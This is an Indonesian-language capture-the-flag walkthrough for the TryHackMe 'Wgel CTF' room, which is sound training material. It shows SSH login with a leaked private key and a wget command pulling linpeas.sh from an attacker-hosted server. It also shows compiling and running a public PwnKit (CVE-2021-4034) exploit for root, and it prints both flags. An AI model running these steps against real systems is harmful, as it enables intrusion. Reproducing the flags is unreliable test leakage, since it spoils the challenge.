WU4 - Wgel ctf

Calvin Winata, Vincentius Farrel



Hasil scan Nmap:

Hasil scan gobuster:

Check bagian page Ubuntu:

Setelah saya kumpulkan informasi yang saya dapatkan, saya pertama coba melakukan login ssh dengan username jessie@Ip_address. Ternyata harus pake password, jadinya saya coba cari passwordnya.

Pada gobuster terdapat directory /sitemap yang ternyata sebuah website.

Jadi saya coba scan lagi Nmap dan gobuster dan ini hasilnya

Hasil scan yang menarik yaitu /.ssh dan didalamnya terdapat sebuat RSA private key. Dengan RSA private key ini saya bisa login langsung ssh tanpa password.

Pertama saya masukan file dan ubah permissionnya menjadi 600, lalu saya jalankan ssh dengan file tersebut:

Ssh -i pass jessie@Iproom

Berhasil login sebagai jessie, lalu saya coba cari flag pertamanya dan flag pertamnya terletak di bagian:

/home/jessie/Documents

User Flag: 057c67131c3d5e42dd5cd3075b198ff6

Ketika saya ingin mengecheck admin dengan sudo ternyata tidak bisa jadi saya coba untuk scan vulnerability dalam privilage escalation.

1. Pertama nyalakan server python didalam mesin local dengan command: python -m http.server (setelah download linpeas.sh)
2. Setelah itu download linpeas.sh melalui terminal jessie the command wget http://IP_THM:8000/linpeas.sh
3. Setelah download kasih linpeas.sh permision dan execute.

Saya coba paling pwnkit [CVE-2021-4034] dan menemukan sebuat script CVE tersebut di github ini: https://github.com/arthepsy/CVE-2021-4034

Saya melakukan hal yang sama seperti linepeas.sh, lalu execute scriptnya.
1. Pertama di compile gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
2. Lalu execute ./cve-2021-4034-poc
3. Ketika terimanal seperti ini, lalu cari root flagnya


Dan ini dia flagnya


Root Flag: b1b968b37519ad1daa6408188649263d


Thank you for reading!